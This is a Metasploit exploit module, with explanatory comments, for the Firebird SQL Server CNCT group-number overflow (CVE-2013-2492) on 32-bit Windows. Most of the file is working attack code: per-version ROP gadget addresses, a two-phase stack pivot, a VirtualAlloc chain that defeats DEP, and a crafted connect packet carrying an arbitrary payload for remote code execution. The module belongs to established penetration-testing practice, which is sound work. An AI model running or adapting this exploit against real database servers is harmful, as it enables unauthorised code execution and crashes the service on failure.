##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
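# Firebird SQL Server CNCT group-number overflow (CVE-2013-2492), x86 Windows.
#
# Operational caveats a practitioner should read before running this:
#   * Every target table entry is a set of absolute addresses inside
#     fbserver.exe (0x004xxxxx) and icuuc30.dll (0x4a8xxxxx).  Nothing here
#     leaks or computes a base, so the chosen target only works when those
#     images are loaded at the bases the addresses were taken from; a rebased
#     image turns the attempt into a crash (Stability: CRASH_SERVICE_RESTARTS).
#   * The 'Debug' target is deliberately filled with 0xdead1337 / 0x41414141
#     and exists to crash the service under a debugger; it never yields a
#     session.
#   * `check` only proves that a Firebird wire-protocol listener answered; it
#     cannot tell a patched build from a vulnerable one.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp

  # Module metadata.  The per-target hash carries three addresses:
  #   pivot   - pointer that replaces the overwritten one (the controlled read)
  #   rop_nop - a bare RETN gadget used to build the ROP NOP sled
  #   rop_pop - a POP r32 # RETN gadget used to skip the original pivot dword
  def initialize
    super(
      'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
      'Description' => %q{
        This module exploits a vulnerability in Firebird SQL Server. A specially
        crafted packet can be sent which will overwrite a pointer allowing the attacker to
        control where data is read from. Shortly, following the controlled read, the
        pointer is called resulting in code execution.

        The vulnerability exists with a group number extracted from the CNCT information,
        which is sent by the client, and whose size is not properly checked.

        This module uses an existing call to memcpy, just prior to the vulnerable code,
        which allows a small amount of data to be written to the stack. A two-phases
        stack pivot allows to execute the ROP chain which ultimately is used to execute
        VirtualAlloc and bypass DEP.
      },
      'Author' => 'Spencer McIntyre',
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'References' => [
        [ 'CVE', '2013-2492' ],
        [ 'OSVDB', '91044' ]
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'seh'
      },
      'Payload' => {
        # Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
        # Prepended to every payload: reloads ESP from the TEB's stack base so the
        # shellcode runs on a sane stack after the ROP chain.
        'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
        'Space' => 400,
        'BadChars' => "\x00\x0a\x0d"
      },
      'Targets' => [
        # pivots are pointers to stack pivots of size 0x28
        [ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
        [ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
        [ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
        [ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
        # Development-only target: guaranteed crash, useful under a debugger.
        [ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'DisclosureDate' => 'Jan 31 2013',
      'Notes' => {
        'Stability' => [ CRASH_SERVICE_RESTARTS ],
      },
    )

    register_options([Opt::RPORT(3050)])
  end

  # Probe whether RHOST:RPORT speaks the Firebird wire protocol.
  #
  # Sends a benign op_connect request for a random, non-existent database
  # path and inspects the first opcode the server returns.  An op_accept (3)
  # proves only that a Firebird listener answered, so the best result is
  # CheckCode::Detected -- the version is never verified.
  #
  # @return [Exploit::CheckCode] Unknown when no connection or no usable reply
  #   could be obtained, Detected when the server accepted the connect request,
  #   Safe for any other opcode.
  def check
    begin
      connect
    rescue => e
      vprint_error("Unable to get a connection: #{e.message}")
      return Exploit::CheckCode::Unknown
    end

    # 3 ("C:\") + 12 + 4 (".fdb") = 19 = 0x13, the length dword sent just before it.
    filename = "C:\\#{rand_text_alpha(12)}.fdb"
    username = rand_text_alpha(7)

    check_data = ""
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
    check_data << "\x00\x00\x00\x13"
    check_data << filename
    check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"
    check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"
    check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
    check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
    check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
    check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
    check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
    check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
    check_data << "\x00\x00\x00\x08"

    # Always release the socket, even if the write or read raises.
    data = nil
    begin
      sock.put(check_data)
      data = sock.recv(16)
    ensure
      disconnect
    end

    # The opcode is the first big-endian dword; an empty or truncated reply
    # tells us nothing, so report Unknown instead of a misleading Safe.
    return Exploit::CheckCode::Unknown if data.nil? || data.bytesize < 4

    opcode = data.unpack("N").first
    return Exploit::CheckCode::Detected if opcode == 3 # op_accept

    # NOTE(review): any other opcode is reported as Safe; a Firebird build that
    # merely rejects the offered protocol versions would be misreported here.
    Exploit::CheckCode::Safe
  end

  # First-phase ROP chain, written to the stack by the memcpy described in
  # #exploit.  Its only job is to move ESP onto the second chain, so each
  # variant is five dwords (20 bytes) and must fit inside the 32-byte budget
  # together with the two leading dwords added by #exploit.
  #
  # @return [String] packed little-endian gadget addresses for the selected target
  def stack_pivot_rop_chain
    case target.name
    when 'Windows FB 2.5.2.26539'
      rop_chain = [
        0x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe]
        0x0059ffeb, # POP EBP # RETN [fbserver.exe]
        0x0000153c, # 0x0000153c-> ebp
        0x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
        0x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.5.1.26351'
      rop_chain = [
        0x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe]
        0x0059650b, # POP EBP # RETN [fbserver.exe]
        0x0000153c, # 0x0000153c-> ebp
        0x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]
        0x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.5.18496'
      rop_chain = [
        0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
        0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
        0x000001c0, # 0x000001c0-> ecx
        0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
        0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
      ].pack("V*")
    when 'Windows FB 2.1.4.18393'
      rop_chain = [
        0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
        0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
        0x000001c0, # 0x000001c0-> ecx
        0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
        0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
      ].pack("V*")
    when 'Debug'
      # Six marker dwords (24 bytes) -- intentionally one more than the real
      # chains so the Debug payload uses the whole 32-byte memcpy budget.
      rop_chain = Array.new(6, 0x41414141).pack("V*")
    else
      # Unreachable with the targets declared above; fail loudly rather than
      # returning nil and raising a confusing TypeError in #exploit.
      fail_with(Failure::NoTarget, "No stack pivot chain for target #{target.name}")
    end
    rop_chain
  end

  # Second-phase ROP chain: resolves VirtualAlloc through the fbserver.exe IAT,
  # sets up PUSHAD-style arguments (size 0x1000, PAGE_EXECUTE_READWRITE 0x40)
  # and lands in the payload that follows it.  Every variant is 17 dwords.
  #
  # @return [String] packed little-endian gadget addresses for the selected target
  def final_rop_chain
    # all rop chains in here created with mona.py, thanks corelan!
    case target.name
    when 'Windows FB 2.5.2.26539'
      rop_chain = [
        0x4a831344, # POP ECX # RETN [icuuc30.dll]
        0x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x00431905, # POP EBP # RETN [fbserver.exe]
        0x00401932, # & push esp # ret [fbserver.exe]
        0x4a844ac0, # POP EBX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> ebx
        0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x005dae9e, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x0057a822, # POP EDI # RETN [fbserver.exe]
        0x005b0384, # RETN (ROP NOP) [fbserver.exe]
        0x0046f8c3, # POP EAX # RETN [fbserver.exe]
        0x90909090, # nop
        0x00586002, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.5.1.26351'
      rop_chain = [
        0x00656472, # POP ECX # RETN [fbserver.exe]
        0x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x0041d1ae, # POP EBP # RETN [fbserver.exe]
        0x0040917f, # & call esp [fbserver.exe]
        0x4a8589c0, # POP EBX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> ebx
        0x4a864cc3, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x0064ef59, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x005979fa, # POP EDI # RETN [fbserver.exe]
        0x00424a50, # RETN (ROP NOP) [fbserver.exe]
        0x4a86052d, # POP EAX # RETN [icuuc30.dll]
        0x90909090, # nop
        0x005835f2, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.5.18496'
      rop_chain = [
        0x005763d5, # POP EAX # RETN [fbserver.exe]
        0x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]
        0x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x004e695a, # POP EBP # RETN [fbserver.exe]
        0x004d9e6d, # & jmp esp [fbserver.exe]
        0x4a828650, # POP EBX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> ebx
        0x4a85bfee, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x00590328, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x4a8573a1, # POP EDI # RETN [icuuc30.dll]
        0x0042ba8c, # RETN (ROP NOP) [fbserver.exe]
        0x00577605, # POP EAX # RETN [fbserver.exe]
        0x90909090, # nop
        0x004530ce, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Windows FB 2.1.4.18393'
      rop_chain = [
        0x4a843429, # POP ECX # RETN [icuuc30.dll]
        0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
        0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
        0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
        0x004279c0, # POP EBP # RETN [fbserver.exe]
        0x0040747d, # & call esp [fbserver.exe]
        0x004ebef1, # POP EBX # RETN [fbserver.exe]
        0x00001000, # 0x00001000-> ebx
        0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
        0x00001000, # 0x00001000-> edx
        0x004eaa3b, # POP ECX # RETN [fbserver.exe]
        0x00000040, # 0x00000040-> ecx
        0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
        0x00423b82, # RETN (ROP NOP) [fbserver.exe]
        0x0046b5b1, # POP EAX # RETN [fbserver.exe]
        0x90909090, # nop
        0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
      ].pack("V*")
    when 'Debug'
      # 18 marker dwords; size kept as originally tuned.
      rop_chain = Array.new(18, 0x41414141).pack("V*")
    else
      fail_with(Failure::NoTarget, "No final ROP chain for target #{target.name}")
    end
    rop_chain
  end

  # Build and send the malicious op_connect request.
  #
  # Layout of the request, in order:
  #   1. a CNCT entry of type 0x05 with declared length 0x20 (32 bytes) whose
  #      body is the data the vulnerable memcpy copies onto the stack:
  #      a POP gadget, the controlled pointer (pivot - 8) and the first-phase
  #      pivot chain;
  #   2. the remainder of a plausible connect request;
  #   3. a 17-entry RETN sled, the second-phase ROP chain and the payload.
  #
  # Sends exactly one request and disconnects; a failed attempt crashes the
  # service (see 'Notes').
  def exploit
    # 17 RETN gadgets so the pivoted ESP can land anywhere in the sled.
    rop_nop_sled = Array.new(17, target['rop_nop']).pack("V*")

    # this data gets written to the stack via memcpy, no more than 32 bytes can be written
    overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot
    overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]
    overwrite_and_rop_chain << stack_pivot_rop_chain
    # Guard the budget stated above so a future target cannot silently overrun it.
    if overwrite_and_rop_chain.bytesize > 32
      fail_with(Failure::BadConfig, "Stack overwrite data exceeds 32 bytes for target #{target.name}")
    end

    # 3 ("C:\") + 13 + 4 (".fdb") = 20 = 0x14, the length dword sent just before it.
    filename = "C:\\#{rand_text_alpha(13)}.fdb"
    evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"
    evil_data << "\x00\x00\x00\x14"
    evil_data << filename
    evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"
    evil_data << "\x05\x20" # CNCT entry: type 5, declared length 0x20
    evil_data << overwrite_and_rop_chain
    evil_data << "\x15\x6c\x6f\x63\x61\x6c"
    evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"
    evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"
    evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"
    evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"
    evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"
    evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"
    evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"
    evil_data << rop_nop_sled
    evil_data << final_rop_chain
    evil_data << payload.encoded

    print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")

    # Connect only once the request is fully built, and always release the
    # socket even if the write raises.
    connect
    begin
      sock.put(evil_data)
    ensure
      disconnect
    end
  end
end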